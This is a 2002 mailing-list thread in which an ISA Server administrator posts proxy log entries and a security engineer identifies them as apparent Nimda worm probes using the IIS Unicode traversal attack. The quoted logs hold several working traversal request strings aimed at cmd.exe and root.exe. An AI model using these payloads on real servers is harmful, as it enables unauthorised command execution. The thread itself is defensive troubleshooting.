Hi Vinay, that looks like an attempt by Nimda worm or maybe some attacker. This worm infects other hosts by making use of the UNICODE attack. Make sure your IIS servers are protected against this and other attacks. Check out the microsoft security page regarding this. http://www.microsoft.com/technet/prodtechnol/isa/deploy/isanimda.asp Regards ------------------------------------------------------------ Sandro Gauci - Security Engineer - GFI - http://www.gfi.com ------------------------------------------------------------ -----Original Message----- From: Vinaykumar G [mailto:G.Vinay@xxxxxxxxx] Sent: Tuesday, March 12, 2002 11:16 AM To: [ISAserver.org Discussion List] Subject: [isalist] Block these entries inISA logs please!!!!!! Importance: High http://www.ISAserver.org Hi All, Can anyone let me know as how we can block these strange entries in my ISA Log. What is someone exactly trying to execute? What should be done to block these entries?I have ISA in integrated mode with win2k server fully patched. xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:16 W3ReverseProxy ISAICR - - - - - - 97 - TCP GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:18 W3ReverseProxy ISAICR - - - - - - 97 - TCP GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:19 W3ReverseProxy ISAICR - - - - - - 98 - TCP GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:21 W3ReverseProxy ISAICR - - - - - - 96 - TCP GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:23 W3ReverseProxy ISAICR - - - - - - 100 - TCP GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 401 - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 06:55:25 W3ReverseProxy ISAICR - - - - - - 96 - TCP GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:07 W3ReverseProxy ISAICR - - - - - - 72 - TCP GET /scripts/root.exe?/c+dir - - 12202 0 Default rule - xxx.xxx.xxx.xxx anonymous - N 2002-03-10 12:47:09 W3ReverseProxy ISAICR - - - - - - 70 - TCP GET /MSADC/root.exe?/c+dir - - 12202 0 Default rule - Regards, Vinay. ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: sandro@xxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') **************************************************************** This mail was content checked for malicious code or viruses by Mail security. Mail security provides email content checking, exploit detection and anti-virus for Exchange. Spam, viruses, dangerous attachments & offensive content are removed automatically. Key features include: Multiple virus engines; Email content & attachment checking; Exploit shield ? Email intrusion detection & defence; Email threats engine ? Analyses & defuses HTML scripts, .exe files & more. *************************************************************** In addition to Mail essentials, GFI also produces the FAXmaker fax server & LANguard network security product range. For more information on our products please visit <http://www.gfi.com>